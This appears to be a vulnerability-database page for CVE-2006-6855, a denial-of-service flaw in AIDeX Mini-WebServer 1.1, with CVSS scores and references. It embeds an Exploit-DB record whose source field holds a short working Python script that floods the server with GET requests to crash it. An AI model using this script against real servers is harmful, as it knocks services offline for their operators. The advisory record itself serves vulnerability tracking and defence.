Search...

CVE-2006-6855

2006-12-31T05:00:00

ID CVE-2006-6855
Type cve
Reporter cve@mitre.org
Modified 2017-10-19T01:29:00

Description

AIDeX Mini-WebServer 1.1 early release 3 allows remote attackers to cause a denial of service (daemon crash) via a flood of HTTP GET requests, possibly related to display of HTTP log data by the GUI. NOTE: some of these details are obtained from third party information.

JSON Vulners Source

Initial Source

{"id": "CVE-2006-6855", "bulletinFamily": "NVD", "title": "CVE-2006-6855", "description": "AIDeX Mini-WebServer 1.1 early release 3 allows remote attackers to cause a denial of service (daemon crash) via a flood of HTTP GET requests, possibly related to display of HTTP log data by the GUI. NOTE: some of these details are obtained from third party information.", "published": "2006-12-31T05:00:00", "modified": "2017-10-19T01:29:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-6855", "reporter": "cve@mitre.org", "references": ["https://www.exploit-db.com/exploits/3034", "http://www.addict3d.org/index.php?page=viewarticle&type=security&ID=8473", "http://www.securityfocus.com/bid/21816", "http://securitytracker.com/id?1017455", "http://secunia.com/advisories/23569", "https://exchange.xforce.ibmcloud.com/vulnerabilities/31153"], "cvelist": ["CVE-2006-6855"], "type": "cve", "lastseen": "2019-05-29T18:08:35", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "1eeeff2b195e8baf65fa4822cbafdf1c"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "f271f63819170801c5269a21a2012cab"}, {"key": "cpe23", "hash": "9c8387b8628fd173b98b963b0dd62798"}, {"key": "cvelist", "hash": "25a09fe0fd872f93fca16f115aa0f11f"}, {"key": "cvss", "hash": "41b62a8aa1ee5c40897717cadc30784a"}, {"key": "cvss2", "hash": "85fc9715d07b57d9e72056856b007c7b"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "78a7a5cbaf09985c14389298e454e7db"}, {"key": "description", "hash": "5b5cc26e9ae4d50d547a56ff5c12e490"}, {"key": "href", "hash": "4a81b9a7fd6aa12dd4cddb0089ebe6c6"}, {"key": "modified", "hash": "444d43e9817288cd3cd8e6c9a31c8aed"}, {"key": "published", "hash": "ed57dcc4fb5c911b94ea09eeae1c33f5"}, {"key": "references", "hash": "a47b4045b538052051a54d63d12a2f66"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "588b3fe02afec81e48e4f3a37968615e"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "d6b15ddc45f7cac4636968a4116d3420f9427492848d88c71576da8bd77fb27f", "viewCount": 0, "enchantments": {"score": {"value": 5.9, "vector": "NONE", "modified": "2019-05-29T18:08:35"}, "dependencies": {"references": [{"type": "osvdb", "idList": ["OSVDB:32537"]}, {"type": "exploitdb", "idList": ["EDB-ID:3034"]}], "modified": "2019-05-29T18:08:35"}, "vulnersScore": 5.9}, "objectVersion": "1.3", "cpe": ["cpe:/a:aidex:mini-webserver:1.1_rc3"], "affectedSoftware": [{"name": "aidex mini-webserver", "operator": "eq", "version": "1.1_rc3"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:aidex:mini-webserver:1.1_rc3:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"]}

{"exploitdb": [{"lastseen": "2016-01-31T17:35:42", "bulletinFamily": "exploit", "description": "AIDeX Mini-WebServer <= 1.1 Remote Denial of Service Crash Exploit. CVE-2006-6855. Dos exploit for windows platform", "modified": "2006-12-28T00:00:00", "published": "2006-12-28T00:00:00", "id": "EDB-ID:3034", "href": "https://www.exploit-db.com/exploits/3034/", "type": "exploitdb", "title": "AIDeX Mini-WebServer <= 1.1 - Remote Denial of Service Crash Exploit", "sourceData": "import socket\n\nprint \"---------------------------------------------------------------------\"\nprint \"# AID'eX Mini-Webserver Verion 1.1 early Release 3 Denial of Service\"\nprint \"# url: http://www.aidex.de/software/webserver/\"\nprint \"# author: shinnai\"\nprint \"# mail: shinnai[at]autistici[dot]org\"\nprint \"# site: http://shinnai.altervista.org\"\nprint \"# soundtrack: \"Suzanne\" (Leonard Cohen)\nprint \"---------------------------------------------------------------------\"\n\nhost = \"127.0.0.1\"\nport = 80\n\nfor i in range (0,100):\n connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n connection.connect((host, port))\n connection.send(\"GET / HTTP/1.0 \\n\\n\")\n\n# milw0rm.com [2006-12-28]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3034/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1017455\n[Secunia Advisory ID:23569](https://secuniaresearch.flexerasoftware.com/advisories/23569/)\nOther Advisory URL: http://www.addict3d.org/index.php?page=viewarticle&type=security&ID=8473\nOther Advisory URL: http://milw0rm.com/exploits/3034\nISS X-Force ID: 31153\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3034\n[CVE-2006-6855](https://vulners.com/cve/CVE-2006-6855)\nBugtraq ID: 21816\n", "modified": "2006-12-28T10:03:51", "published": "2006-12-28T10:03:51", "href": "https://vulners.com/osvdb/OSVDB:32537", "id": "OSVDB:32537", "title": "AIDeX Mini-Webserver HTTP Request Saturation DoS", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}]}